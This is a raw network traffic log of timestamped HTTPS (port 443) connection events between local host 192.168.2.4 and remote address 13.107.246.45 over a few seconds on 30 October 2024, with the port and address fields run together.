Oct 30, 2024 03:46:54.105941057 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.111222982 CET4434987213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.111242056 CET4434987213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.111279964 CET4434987213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.111361980 CET49872443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.111628056 CET49872443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.111639023 CET4434987213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.111671925 CET49872443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.111676931 CET4434987213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.113621950 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.113632917 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.113698006 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.113817930 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.113826990 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.123874903 CET4434987113.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.123954058 CET4434987113.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.124056101 CET49871443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.124231100 CET49871443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.124237061 CET4434987113.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.124244928 CET49871443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.124248028 CET4434987113.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.126420975 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.126451015 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.126537085 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.126653910 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.126674891 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.293946028 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.294491053 CET49874443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.294502020 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.294950962 CET49874443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.294955969 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.426146030 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.426218033 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.426285982 CET49874443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.426552057 CET49874443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.426558971 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.426707029 CET49874443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.426711082 CET4434987413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.430296898 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.430326939 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.430401087 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.430639982 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.430651903 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.581715107 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.586090088 CET49875443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.586100101 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.586586952 CET49875443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.586591959 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.714483976 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.715013027 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.715303898 CET49875443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.715400934 CET49875443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.715408087 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.715420008 CET49875443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.715424061 CET4434987513.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.718108892 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.718137026 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.718206882 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.718358040 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.718372107 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.835050106 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.838502884 CET49876443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.838515043 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.839344025 CET49876443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.839349031 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.840284109 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.842159033 CET49877443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.842221022 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.842624903 CET49877443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.842639923 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.845192909 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.846010923 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.846043110 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.846400976 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.846411943 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.858146906 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.862107038 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.862114906 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.862621069 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.862624884 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.965416908 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.965450048 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.965729952 CET49876443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.965739012 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.965847015 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.965898991 CET49876443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.966061115 CET49876443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.966069937 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.966078997 CET49876443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.966084003 CET4434987613.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.971280098 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.971487045 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.971544981 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.971656084 CET49877443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.971656084 CET49877443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.971656084 CET49877443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.971713066 CET49877443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.971735001 CET4434987713.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.973834038 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.973902941 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.974014044 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.974087000 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.974126101 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.974126101 CET49879443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.974143982 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.974164963 CET4434987913.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.974590063 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.974622011 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.976548910 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.976583004 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.976589918 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.976655006 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.976845980 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.976864100 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.976876020 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.976890087 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.991199017 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.991251945 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.993804932 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.993850946 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.993855000 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.993864059 CET49878443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.993868113 CET4434987813.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.996078014 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.996094942 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:54.996160030 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.996311903 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:54.996321917 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.148946047 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.149667978 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.149708033 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.150527954 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.150537014 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.284857035 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.284924984 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.285634995 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.285748959 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.285773993 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.285792112 CET49880443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.285801888 CET4434988013.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.289100885 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.289134979 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.289346933 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.290540934 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.290560007 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.440747976 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.441225052 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.441245079 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.441660881 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.441668987 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.572477102 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.572526932 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.572581053 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.572585106 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.572629929 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.572777987 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.572793007 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.572803020 CET49881443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.572808027 CET4434988113.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.575371027 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.575392962 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.575572014 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.575814962 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.575829029 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.710828066 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.711350918 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.711379051 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.711821079 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.711828947 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.722502947 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.722837925 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.722851992 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.723300934 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.723304987 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.725502968 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.725811958 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.725822926 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.726226091 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.726229906 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.840611935 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.840694904 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.840900898 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.840929985 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.840949059 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.840971947 CET49882443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.840979099 CET4434988213.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.843688011 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.843727112 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.843882084 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.844012976 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.844031096 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.855704069 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.855757952 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.856055021 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.856209993 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.856220007 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.856230974 CET49884443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.856236935 CET4434988413.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.858272076 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.858309031 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.858366966 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.858419895 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.858580112 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.858596087 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.858736038 CET49883443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.858741999 CET4434988313.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.861423969 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.861449957 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.861563921 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.861761093 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.861772060 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.863509893 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.863533974 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:55.863621950 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.863962889 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:55.863970995 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.050470114 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.050951004 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.050962925 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.051459074 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.051465034 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.187427998 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.187459946 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.187510967 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.187568903 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.187820911 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.187841892 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.187855005 CET49885443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.187868118 CET4434988513.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.190706968 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.190733910 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.190821886 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.190993071 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.191004992 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.316689014 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.319470882 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.319489956 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.320055008 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.320061922 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.459032059 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.459146976 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.459198952 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.459346056 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.459357977 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.459369898 CET49886443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.459376097 CET4434988613.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.461971998 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.462007046 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.462322950 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.462472916 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.462486982 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.588242054 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.588397026 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.588825941 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.588836908 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.589287043 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.589293003 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.589538097 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.589561939 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.590007067 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.590012074 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.591300964 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.591636896 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.591651917 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.592025042 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.592030048 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.716860056 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.716960907 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.717006922 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.717289925 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.717289925 CET49888443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.717300892 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.717308998 CET4434988813.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.719794989 CET49892443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.719815969 CET4434989213.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.719887972 CET49892443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.720050097 CET49892443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.720061064 CET4434989213.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.720777035 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.720860004 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.720904112 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.720913887 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.720952988 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.720988035 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.720995903 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.721007109 CET49889443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.721010923 CET4434988913.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.721029997 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.721226931 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.721353054 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.721353054 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.721381903 CET49887443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.721395969 CET4434988713.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.723830938 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.723917961 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.724066019 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.724127054 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.724140882 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.724147081 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.724154949 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.724216938 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.724288940 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.724297047 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.920340061 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.920995951 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.921015978 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:56.921489954 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:56.921497107 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.049021959 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.049225092 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.049323082 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.049498081 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.049498081 CET49890443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.049508095 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.049515009 CET4434989013.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.052217960 CET49895443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.052283049 CET4434989513.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.052371979 CET49895443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.052509069 CET49895443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.052541971 CET4434989513.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.194617987 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.195139885 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.195154905 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.195605993 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.195611954 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.324430943 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.324460030 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.324510098 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.324528933 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.324567080 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.324724913 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.324734926 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.324759960 CET49891443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.324764967 CET4434989113.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.327498913 CET49896443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.327539921 CET4434989613.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.327626944 CET49896443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.327774048 CET49896443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.327800989 CET4434989613.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.448930979 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.449408054 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.449434042 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.449871063 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.449877977 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.452567101 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.452920914 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.452944994 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.453391075 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.453397989 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.466105938 CET4434989213.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.466701031 CET49892443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.466711044 CET4434989213.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.467202902 CET49892443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.467209101 CET4434989213.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.576883078 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.577058077 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.577213049 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.577260017 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.577291012 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.577303886 CET49893443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.577311039 CET4434989313.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.580085039 CET49897443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.580128908 CET4434989713.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.580225945 CET49897443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.580389023 CET49897443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.580400944 CET4434989713.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.585617065 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.586071968 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.586126089 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.586180925 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.586204052 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.586220026 CET49894443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.586225986 CET4434989413.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.588368893 CET49898443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.588403940 CET4434989813.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.588481903 CET49898443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.588613987 CET49898443192.168.2.413.107.246.45
Oct 30, 2024 03:46:57.588640928 CET4434989813.107.246.45192.168.2.4
Oct 30, 2024 03:46:57.617455006 CET4434989213.107.246.45192.168.2.4
